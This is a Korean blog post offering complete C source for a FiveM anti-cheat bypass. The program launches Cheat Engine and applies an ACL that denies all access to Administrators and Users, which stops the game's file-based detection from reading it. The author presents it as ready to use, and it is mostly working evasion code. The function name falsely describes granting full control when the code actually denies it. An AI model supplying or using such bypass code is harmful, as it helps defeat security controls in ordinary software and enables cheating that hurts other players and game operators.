Fivem Cheat Engine Bypass
Fivem은 현재 Windows Station안에 있는 Process를 찾고 CreateFile, ReadFile,GetFileAttributes 등 API를 사용해 패턴 매칭을 하는 것 같다.
우회 순서는 Cheat Engine을 실행 후 권한 변경을 통해 Fivem이 탐지 API를 무력화 시키는것임..
로직의 흐름은 SID 생성하고 권한 할당 후 적용 시키는 방식이다.
자료가 많이 없어 좀 해맸다.. 항상 성공하면 뿌듯~ㅋ
# AllocateAndInitializeSid
# SetEntriesInAcl
# SetSecurityInfo
나중에 까먹을까봐 메모
사용 하실분은 쓰세요 궁금하신건 댓글 달아 주세영
#include <windows.h>
#include <stdio.h>
#include <AclAPI.h>
#include <tchar.h>
#pragma comment(lib, "advapi32.lib")
BOOL CreateDirectoryWithUserFullControlACL(LPCTSTR lpPath)
{
STARTUPINFO si = { 0, };
PROCESS_INFORMATION pi;
BOOL CreaP = CreateProcess(lpPath, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (CreaP == 0)
{
printf("[*]Create Process Faile\n");
printf("[*]ERROR CODE: %0x%X\n", GetLastError());
return FALSE;
}
printf("[*]Create Success\n");
HANDLE hDir = CreateFile(lpPath, READ_CONTROL | WRITE_DAC, 0, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE)
{
printf("[*]Create File Fail\n");
printf("[*]ERROR CODE: %0x%X\n", GetLastError());
return FALSE;
}
printf("[*]Create File Success\n");
SECURITY_DESCRIPTOR* pSD = NULL;
DWORD dwRes;
PSID pEveryoneSID = NULL, pAdminSID = NULL, pUserSID = NULL;
EXPLICIT_ACCESS ea[2];
SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
PACL pACL = NULL;
if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdminSID))
{
_tprintf(_T("[*]AllocateAndInitializeSid Error %u\n"), GetLastError());
goto CleanUp;
}
ea[0].grfAccessPermissions = GENERIC_ALL;
ea[0].grfAccessMode = DENY_ACCESS;
ea[0].grfInheritance = NO_INHERITANCE;
ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[0].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
ea[0].Trustee.ptstrName = (LPTSTR)pAdminSID;
if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_USERS,
0, 0, 0, 0, 0, 0,
&pUserSID))
{
_tprintf(_T("[*]AllocateAndInitializeSid Error %u\n"), GetLastError());
goto CleanUp;
}
ea[1].grfAccessPermissions = GENERIC_ALL;
ea[1].grfAccessMode = DENY_ACCESS;
ea[1].grfInheritance = NO_INHERITANCE;
ea[1].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[1].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
ea[1].Trustee.ptstrName = (LPTSTR)pUserSID;
dwRes = SetEntriesInAcl(2, ea, NULL, &pACL);
if (dwRes != ERROR_SUCCESS)
{
_tprintf(_T("[*]SetEntriesInAcl Error %u\n"), GetLastError());
goto CleanUp;
}
if (pACL)
SetSecurityInfo(hDir, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL);
return TRUE;
CleanUp:
if (pAdminSID)
FreeSid(pAdminSID);
if (pEveryoneSID)
FreeSid(pEveryoneSID);
if (pUserSID)
FreeSid(pUserSID);
return FALSE;
}
int main(int argc, char** argv) {
if (argv[1] == NULL)
{
printf("[*]Invaild Argument.. Input Path\n");
return -1;
}
printf("[*]Path: %s\n", argv[1]);
BOOL status = CreateDirectoryWithUserFullControlACL(argv[1]);
if (status == TRUE)
{
printf("[*]Complete\n");
return 0;
}
else
{
printf("[*]Faile\n");
return -1;
}
}
# Reference
https://docs.microsoft.com/en-us/windows/win32/api/accctrl/ns-accctrl-explicit_access_a
EXPLICIT_ACCESS_A (accctrl.h) - Win32 apps
Defines access control information for a specified trustee.
docs.microsoft.com
https://deguls.tistory.com/entry/DACL%EA%B3%BC-SACL-%EB%B3%B5%EC%8A%B5
DACL과 SACL 복습
출처: http://blog.naver.com/knuabhoony?Redirect=Log&logNo=40014321712 일반적으로 ACL 이라고만 하면 DACL를 뜻함. DACL = discretionary access control list SACL = security access control list DACL에는..
deguls.tistory.com
https://docs.microsoft.com/en-us/windows/win32/fileio/file-security-and-access-rights
File Security and Access Rights - Win32 apps
Because files are securable objects, access to them is regulated by the access-control model that governs access to all other securable objects in Windows.
docs.microsoft.com
'Develop > C, CheatEngine' 카테고리의 다른 글
| saevo 서든어택 anticheat-bypass (3) | 2021.10.06 |
|---|---|
| debugge, debugger (0) | 2021.09.28 |